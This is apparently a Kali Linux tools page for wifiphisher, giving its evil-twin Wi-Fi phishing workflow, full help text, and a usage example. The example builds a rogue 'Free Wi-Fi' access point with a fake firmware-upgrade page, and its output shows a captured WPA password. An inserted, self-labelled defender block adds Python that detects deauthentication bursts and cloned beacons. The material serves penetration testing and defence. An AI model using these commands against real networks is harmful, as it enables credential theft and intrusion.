wifiphisher: introduction

Wifiphisher is a security tool that mounts automated phishing attacks against Wi-Fi networks. Once it holds an attacker-controlled position, Wifiphisher redirects all HTTP requests to a phishing page, through which it harvests the target user's credentials and other information. It is a social engineering attack that can obtain WPA/WPA2 passphrases; unlike other methods, it does not involve any brute forcing.

From the victim's point of view, the attack takes place in three phases:
1. The target victim is deauthenticated from their access point.
2. The target victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings.
3. The target victim is served a realistic, customized phishing page.
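The first two phases leave traces in the air that a monitor-mode sensor can observe: a burst of deauthentication frames forged with the real AP's address, followed by beacons that copy a known ESSID from a BSSID the operator does not own (often without encryption). The following is an added example of that defender-side check, not code from the wifiphisher page or project; the Frame layout, KNOWN_APS baseline and SAMPLE capture are constructed assumptions.

```python
from collections import defaultdict, namedtuple

# One observed 802.11 management frame (simplified assumptions): ts = capture
# time in seconds, subtype = "beacon" or "deauth", bssid = transmitter address,
# essid/security only meaningful for beacons.
Frame = namedtuple("Frame", "ts subtype essid bssid security")

# Constructed baseline: the BSSIDs and security mode of the network we operate.
KNOWN_APS = {
    "Office-WiFi": {"bssids": {"aa:bb:cc:00:00:01"}, "security": "WPA2"},
}

def find_evil_twins(frames, known=KNOWN_APS):
    """Phase 2: beacons that copy one of our ESSIDs from a foreign BSSID, or
    that advertise a known BSSID with a different security mode (open clone)."""
    findings = []
    for f in frames:
        profile = known.get(f.essid) if f.subtype == "beacon" else None
        if profile is None:
            continue  # not a beacon, or an ESSID we do not own
        if f.bssid.lower() not in profile["bssids"]:
            findings.append(("unknown BSSID advertising our ESSID", f.bssid))
        elif f.security != profile["security"]:
            findings.append(("known BSSID with changed security", f.bssid))
    return findings

def deauth_bursts(frames, window=1.0, threshold=10):
    """Phase 1: BSSIDs sending more than `threshold` deauth frames within any
    `window` seconds. Forged frames carry the real AP's address, so it is our
    own BSSID that shows up here, not the attacker's."""
    per_bssid = defaultdict(list)
    for f in frames:
        if f.subtype == "deauth":
            per_bssid[f.bssid].append(f.ts)
    noisy = []
    for bssid, times in per_bssid.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1  # slide the window's left edge forward
            if end - start + 1 > threshold:
                noisy.append(bssid)
                break
    return noisy

# Constructed capture: our real beacon, an open clone of it, then 12 deauth
# frames forged from our AP's address within about half a second.
SAMPLE = [Frame(0.0, "beacon", "Office-WiFi", "aa:bb:cc:00:00:01", "WPA2"),
          Frame(0.1, "beacon", "Office-WiFi", "de:ad:be:ef:00:01", "OPEN")]
SAMPLE += [Frame(1.0 + i * 0.05, "deauth", "", "aa:bb:cc:00:00:01", "") for i in range(12)]
```

Run against SAMPLE, find_evil_twins reports the open clone and deauth_bursts reports the legitimate BSSID whose address was forged; the same two functions can be fed frames parsed from a real monitor-mode capture.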

Author: sophron
License: GPLv3

Tool source
Tool homepage
Kali wifiphisher Repo

wifiphisher - automated phishing attacks against Wi-Fi networks

root@kali:~# wifiphisher -h
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 08:18
usage: wifiphisher [-h] [-s SKIP] [-jI JAMMINGINTERFACE] [-aI APINTERFACE]
                   [-t TIMEINTERVAL] [-p PACKETS] [-d] [-nJ] [-e ESSID]
                   [-T TEMPLATE] [-pK PRESHAREDKEY]

optional arguments:
  -h, --help            show this help message and exit
  -s SKIP, --skip SKIP  Skip deauthing this MAC address. Example: -s
                        00:11:BB:33:44:AA
  -jI JAMMINGINTERFACE, --jamminginterface JAMMINGINTERFACE
                        Choose monitor mode interface. By default script will
                        find the most powerful interface and starts monitor
                        mode on it. Example: -jI mon5
  -aI APINTERFACE, --apinterface APINTERFACE
                        Choose access point interface. By default script will
                        find the most powerful interface and starts an access
                        point on it. Example: -aI wlan0
  -t TIMEINTERVAL, --timeinterval TIMEINTERVAL
                        Choose the time interval between packets being sent.
                        Default is as fast as possible. If you see scapy
                        errors like 'no buffer space' try: -t .00001
  -p PACKETS, --packets PACKETS
                        Choose the number of packets to send in each deauth
                        burst. Default value is 1; 1 packet to the client and
                        1 packet to the AP. Send 2 deauth packets to the
                        client and 2 deauth packets to the AP: -p 2
  -d, --directedonly    Skip the deauthentication packets to the broadcast
                        address ofthe access points and only send them to
                        client/AP pairs
  -nJ, --nojamming      Skip the deauthentication phase.
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue access point (Evil Twin)
                        This will skip Access Point selection phase.
  -T TEMPLATE, --template TEMPLATE
                        Choose the template to run.Using this option will skip
                        the interactive selection
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point

wifiphisher usage example

Skip the jamming phase (-nJ), create a wireless access point (-e "Free Wi-Fi") and present a fake firmware upgrade to clients (-T firmware-upgrade). When clients connect, they are shown a web page asking them to enter their network's PSK:

root@kali:~# wifiphisher -nJ -e "Free Wi-Fi" -T firmware-upgrade
[*] Starting Wifiphisher 1.1GIT at 2017-02-22 13:52
[+] Selecting wlan0 interface for creating the rogue Access Point
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...

Jamming devices:

DHCP Leases:
1487839973 c0:cc:f8:06:53:93 10.0.0.93 Victims-iPhone 11:c0:cc:38:66:a3:b3

HTTP requests:
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] POST 10.0.0.93 wfphshr-wpa-password=s3cr3tp4s5
[*] GET 10.0.0.93
[*] GET 10.0.0.93
[*] GET 10.0.0.93